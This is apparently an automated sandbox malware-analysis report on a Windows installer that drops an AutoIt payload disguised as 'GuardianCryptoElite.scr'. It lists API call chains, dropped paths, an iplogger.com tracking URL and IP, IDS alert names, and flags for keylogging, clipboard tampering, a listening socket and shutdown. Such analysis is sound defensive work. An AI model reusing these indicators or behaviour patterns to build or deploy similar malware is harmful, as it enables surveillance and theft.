Code function: 10_2_00E3416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

10_2_00E3416A

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: GuardianCryptoElite.scr	Binary or memory string: WIN_81
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_XP
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_XPe
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_VISTA
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_7
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_8
Source: Serious.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	10_2_00E7696E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	10_2_00E76E32
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	16_2_0095696E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	16_2_00956E32

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.76.57	iplogger.com	United States		13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
iplogger.com	104.21.76.57	true
SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.com/15RZZ4	false		unknown

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Virustotal: Detection: 9%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: cW5i0RdQ4L.exe

Virustotal: Detection: 13%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Uses 32bit PE files

Source: cW5i0RdQ4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: cW5i0RdQ4L.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD14 FindFirstFileW,FindClose,	10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,	16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD14 FindFirstFileW,FindClose,	16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00943CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495	Jump to behavior

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.21.76.57 104.21.76.57

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: iplogger.com

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 104.21.76.57:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 104.21.76.57:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

10_2_00E729BA

Source: global traffic	HTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com
Source: global traffic	HTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com

Source: global traffic	DNS traffic detected: DNS query: iplogger.com
Source: global traffic	DNS traffic detected: DNS query: SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:07:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBJvXw6fUbGRbS6RhK%2BGglPGzigQ8JyjV5ntZrCNYPilv4t%2Bg9XoXSqGoRUPjt%2FvFa12kdE6KCZ2qc23Cv6fj1N6EHxcxAdUxPNTrxcgctB2VZpV9yNWlFJp8g7wo2s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b16fe1a345e6e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:08:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUrKGuZsfbYGpfMv7w87P%2FU%2FWzTCe9VK5vZUxav4Fq8km2kSEIxcqEg6xpwukUByhH2upXUjS3mSd6vZP%2F3TdcVGBnYw0NEY9Hv2CUhgQDSfhXPCwQ39bhwGAJEb5I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b176299e4c323-EWR

Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3570670968.00000000009A9000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cW5i0RdQ4L.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Powder.pif, 0000000A.00000002.3571443767.00000000019C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/
Source: Powder.pif, 0000000A.00000002.3571321856.0000000001959000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3571781276.000000000171A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4
Source: Powder.pif, 0000000A.00000002.3571443767.0000000001B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ40
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4O
Source: GuardianCryptoElite.scr, 00000010.00000002.3571413798.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/15RZZ4eListcessId;
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/R
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/m
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Serious.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

0_2_004050CD

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		10_2_00E74830
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		16_2_00954830

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E74632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

0_2_004044A5

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		10_2_00E8D164
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		16_2_0096D164

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E642D5: CreateFileW,DeviceIoControl,CloseHandle,

10_2_00E642D5

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E58F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	10_2_00E65778
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	16_2_00945778

Detected potential crypto function

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0B020	10_2_00E0B020
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E094E0	10_2_00E094E0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E09C80	10_2_00E09C80
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E223F5	10_2_00E223F5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E88400	10_2_00E88400
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36502	10_2_00E36502
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E0E6F0	10_2_00E0E6F0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E3265E	10_2_00E3265E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2282A	10_2_00E2282A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E389BF	10_2_00E389BF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36A74	10_2_00E36A74
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E80A3A	10_2_00E80A3A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E10BE0	10_2_00E10BE0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E5EDB2	10_2_00E5EDB2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2CD51	10_2_00E2CD51
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E80EB7	10_2_00E80EB7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E68E44	10_2_00E68E44
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E36FE6	10_2_00E36FE6
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E233B7	10_2_00E233B7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1D45D	10_2_00E1D45D
